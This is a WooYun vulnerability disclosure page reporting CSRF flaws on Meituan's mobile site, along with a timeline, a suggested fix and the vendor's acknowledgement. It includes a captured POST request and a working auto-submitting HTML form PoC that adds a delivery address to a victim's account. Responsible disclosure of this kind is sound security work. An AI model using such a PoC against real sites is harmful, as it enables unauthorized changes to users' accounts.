当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170006

漏洞标题:美团网多处CSRF

相关厂商:美团网

漏洞作者: Power

提交时间:2016-01-18 16:06

修复时间:2016-03-04 13:27

公开时间:2016-03-04 13:27

漏洞类型:CSRF

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-18: 细节已通知厂商并且等待厂商处理中
2016-01-19: 厂商已经确认,细节仅向厂商公开
2016-01-29: 细节向核心白帽子及相关领域专家公开
2016-02-08: 细节向普通白帽子公开
2016-02-18: 细节向实习白帽子公开
2016-03-04: 细节向公众公开

简要描述:

CSRF

详细说明:

美团在主站www.meituan.com 中使用X-Requested-With(XHR不能跨域发送数据包时自动带入此头部)防止CSRF,Form提交数据的时候不能够构造此头部,但是XHR发包的时候会自动携带此头部。
在i.meituan.com中虽然也会存在这个header 头部,但是删除之后依然可以进行正常数据包提交导致i.meituan.com中几乎所有的功能点都会存在CSRF漏洞。
比如 收藏功能,订单取消功能(需要知道订单id)等等
下面举例地址添加功能,收下抓一个正常的添加地址的包

POST /account/address/edit.json HTTP/1.1
Host: i.meituan.com
Proxy-Connection: keep-alive
Content-Length: 163
Accept: application/json
Origin: http://i.meituan.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://i.meituan.com/account/address/edit?stid=936873039291363072_b1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ********
name=%E6%89%8B%E6%B3%95&phone=1111111116&province=110000&city=110000&district=110101&address=%E6%98%AF%E6%89%93%E5%8F%91%E5%8F%91%E5%8F%91%E5%A4%A7&zipcode=223323


可以看到其中还添加了Origin头部,但是没啥卵用。
测试POC如下

<form name='poc1' action="http://i.meituan.com/account/address/edit.json" method="post">
<input type="text" name="name" value="wocawocawoca">
<input type="text" name="phone" value="111111111">
<input type="text" name="province" value="110000">
<input type="text" name="city" value="110000">
<input type="text" name="district" value="110101">
<input type="text" name="address" value="wocawocawoca" >
<input type="text" name="zipcode" value="11111" >
<input type="text" name="default" value="" >
</form>
<script>
poc1.submit();
</script>


POC访问之后如下图

2.png


查看地址管理中多出收货地址

1.png


其它功能点还有很多,我就不一一测试了。

漏洞证明:

2.png


1.png

修复方案:

Origin 头部 或者 X-Requested-With: XMLHttpRequest

版权声明:转载请注明来源 Power@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2016-01-19 15:39

厂商回复:

非常感谢您对美团安全的关注。如有问题,欢迎反馈

最新状态:

暂无